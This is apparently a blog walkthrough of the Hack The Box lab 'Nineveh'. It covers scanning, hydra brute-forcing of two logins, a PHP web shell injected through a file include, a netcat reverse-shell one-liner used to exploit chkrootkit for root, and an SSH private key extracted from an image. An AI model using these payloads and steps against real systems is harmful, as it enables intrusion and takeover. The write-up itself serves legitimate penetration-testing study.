HTB – Nineveh

Today we are going to solve another CTF challenge “Nineveh”. Nineveh is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Medium

Task: To find user.txt and root.txt

Let’s start off with our basic nmap command to find out the open ports and running services.

root@kali:~/htb/nineveh# nmap -p 22,80,443 10.10.10.43
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-11 09:25 EST
Nmap scan report for 10.10.10.43
Host is up (0.029s latency).

PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 17.96 seconds

We see port 80 and port 443 are open,  and 22 is filtered

We don’t exactly have lot coming from these two static pages, so lets throw dirbuster at port 80 first
DirBuster 1.0-RC1 — Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Wed Oct 18 01:44:50 EDT 2017
 — — — — — — — — — — — — — — — — 
http://10.10.10.43:80
 — — — — — — — — — — — — — — — — 
Directories found during testing:
Dirs found with a 200 response:
/
/department/
/department/css/
/department/files/
Dirs found with a 403 response:
/icons/
/icons/small/
/server-status/

 — — — — — — — — — — — — — — — — 
Files found during testing:
Files found with a 200 responce:
/info.php
/department/login.php
/department/index.php
/department/header.php
/department/footer.php
/department/css/index.php
/department/files/index.php
Files found with a 302 responce:
/department/logout.php
/department/manage.php
— — — — — — — — — — — — — — — —

We see the directory /department/, containing a directory itself of /files/. Seems interesting, so lets take a look into this:

Cool, we have a login over web. Trying typical logins, we notice the site warns when we have a bad username. Enter username ‘admin’ and it tells us bad password. Now that we have the username enumerated, lets use hydra and rockyou.txt to brute force login:

root@kali:~/Downloads# hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" -V
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-11 13:37:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.10.43:80//department/login.php:username=^USER^&password=^PASS^:Invalid Password!
[ATTEMPT] target 10.10.10.43 - login "admin" - pass "123456" - 1 of 14344399 [child 0] (0/0)
--snip--
[ATTEMPT] target 10.10.10.43 - login "admin" - pass "cobain" - 4625 of 14344399 [child 13] (0/0)
[80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-11 13:41:39


Cool, we have a password  Let’s login :
Notice in the above image, the URL specifies a file to read from. This may come in handy later on, but for now lets just keep it in mind. Since there is not much left to look at, lets run a dirb on port 443:
DirBuster 1.0-RC1 — Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Oct 19 12:26:15 EDT 2017
— — — — — — — — — — — — — — — —
https://10.10.10.43:443
— — — — — — — — — — — — — — — — 
Directories found during testing:
Dirs found with a 200 response:
/
/db/
Dirs found with a 403 response:
/icons/
/icons/small/
— — — — — — — — — — — — — — — — 
Files found during testing:
Files found with a 200 responce:
/db/index.php
— — — — — — — — — — — — — — — —

Navigating to /db/ we get a phpliteadmin login:

Ok, on the topic of hydra, lets fire it up once more and get the login:

root@kali:~/Downloads# hydra 10.10.10.43 -l whatever -P /usr/share/wordlists/rockyou.txt https-post-form "/db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -V -s 443
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-11 13:50:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443//db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password.
[ATTEMPT] target 10.10.10.43 - login "whatever" - pass "123456" - 1 of 14344399 [child 0] (0/0)
--snip--
[ATTEMPT] target 10.10.10.43 - login "whatever" - pass "tequieromucho" - 1403 of 14344399 [child 8] (0/0)
[443][http-post-form] host: 10.10.10.43   login: whatever   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-11 13:55:11

Cool, now we have a login for phpliteadmin too! Logging in we see the typical phpMyAdmin page, where we can create new databases and tables. Lets create a new database called ninevehNotes.php, since back over on the port 80 side, it reads ninevehNotes.txt in the notes page. We can create the page, make one table in the database, and give it a simple php reverse shell

<?php echo system($_REQUEST['puck']); ?>

Then i use burp to inject the shell

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&puck=ls

Having a netcat listener running on my local host allows me to catch the /bin/bash that I piped to my IP:

Taking a look around, first thing I do is check out the root directory. The first thing noticed is a directory called /report. Inside this directory is a few text files containing the output from a known rootkit checker called chkrootkit. The files are dated by minute, and you can view from which cronjob it is with cronmonit.sh from ippsec

ww-data@nineveh:/tmp$cat cronmonit.sh 
#!/bin/bash

# Loop by line
IFS=$'\n'

old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0)

while true; do
new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0)
diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]
sleep 1
old_process=$new_process
done

ww-data@nineveh:/tmp$ ./cronmonit.sh
./cronmonit.sh


< root 1293 0.9 0.2 8756 2224 ? Ss Dec09 19:11 /usr/sbin/knockd -d -i ens33
> root 1293 0.9 0.2 8756 2224 ? Ss Dec09 19:12 /usr/sbin/knockd -d -i ens33
< root 1092 0.3 0.5 645344 5592 ? Ssl Dec09 8:13 /usr/bin/lxcfs /var/lib/lxcfs/
> root 1092 0.3 0.5 645344 5592 ? Ssl Dec09 8:14 /usr/bin/lxcfs /var/lib/lxcfs/
< root 10650 0.0 0.0 4512 712 ? Ss 07:09 0:00 \_ /bin/sh -c /root/vulnScan.sh
< root 10652 0.0 0.3 12516 3068 ? S 07:09 0:00 \_ /bin/bash /root/vulnScan.sh
< root 10654 0.0 0.2 4796 2160 ? S 07:09 0:00 \_ /bin/sh /usr/bin/chkrootkit
< root 11625 0.0 0.0 4512 704 ? S 07:09 0:00 \_ /bin/sh /tmp/update
< root 11628 0.0 0.0 7452 672 ? S 07:09 0:00 \_ cat /tmp/2
< root 11629 0.0 0.1 4512 1684 ? S 07:09 0:00 \_ /bin/sh -i
< root 11630 0.0 0.1 11308 1740 ? S 07:09 0:00 \_ nc 10.10.14.19 9876

Using searchsploit, we learn chkrootkit is vulnerable to executing a certain file as root when ran:

Cool, next thing we need to do is make a file called /tmp/update which will shot back a reverse shell, which will be run as root. Again dipping into the reverse shell cheat sheet, we can use a bash backdoor:

#!/bin/bash
rm /tmp/2;mkfifo /tmp/2;cat /tmp/2|/bin/sh -i 2>&1|nc 10.10.14.19 9876 >/tmp/2

write this into the update file, throw up another netcat listener on my local machine, and catch the root shell:

root@kali:~/htb/nineveh# nc -lvp 9876
listening on [any] 9876 ...
10.10.10.43: inverse host lookup failed: Unknown host
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.43] 40794
/bin/sh: 0: can't access tty; job control turned off
# ls
root.txt
vulnScan.sh
# whoami
root
# cat root.txt
8a2*****ec3a

alternative route to user.txt

I kept enumerating the system I found /etc/knockd.conf

[openSSH]
 sequence = 571,290,911

I also found https://10.10.10.43/secure_notes/ there was a photo named nineveh.png that had a private key embedded in the metada.

root@kali:~/htb/nineveh# binwalk nineveh.png

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84 0x54 Zlib compressed data, best compression
2881744 0x2BF8D0 POSIX tar archive (GNU)

root@kali:~/htb/nineveh# binwalk -Me nineveh.png

Scan Time: 2018-12-11 08:38:32
Target File: /root/htb/nineveh/nineveh.png
MD5 Checksum: 353b8f5a4578e4472c686b6e1f15c808
Signatures: 386

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84 0x54 Zlib compressed data, best compression
2881744 0x2BF8D0 POSIX tar archive (GNU)


Scan Time: 2018-12-11 08:38:34
Target File: /root/htb/nineveh/_nineveh.png.extracted/54
MD5 Checksum: d41d8cd98f00b204e9800998ecf8427e
Signatures: 386

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------


Scan Time: 2018-12-11 08:38:34
Target File: /root/htb/nineveh/_nineveh.png.extracted/secret/nineveh.priv
MD5 Checksum: f426d661f94b16292efc810ebb7ea305
Signatures: 386

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PEM RSA private key


Scan Time: 2018-12-11 08:38:34
Target File: /root/htb/nineveh/_nineveh.png.extracted/secret/nineveh.pub
MD5 Checksum: 6b60618d207ad97e76664174e805cfda
Signatures: 386

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 OpenSSH RSA public key

root@kali:~/htb/nineveh/_nineveh.png.extracted/secret# cat nineveh.priv
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----


Nmap done: 1 IP address (1 host up) scanned in 17.96 seconds
root@kali:~/htb/nineveh# knock 10.10.10.43 571:tcp 290:tcp 911:tcp
root@kali:~/htb/nineveh# nmap -p 22,80,443 10.10.10.43
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-11 09:28 EST
Nmap scan report for 10.10.10.43
Host is up (0.025s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https

root@kali:~/htb/nineveh/_nineveh.png.extracted/secret# ssh -i nineveh.priv amrois@10.10.10.43

Author: Jacco Straathof

Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *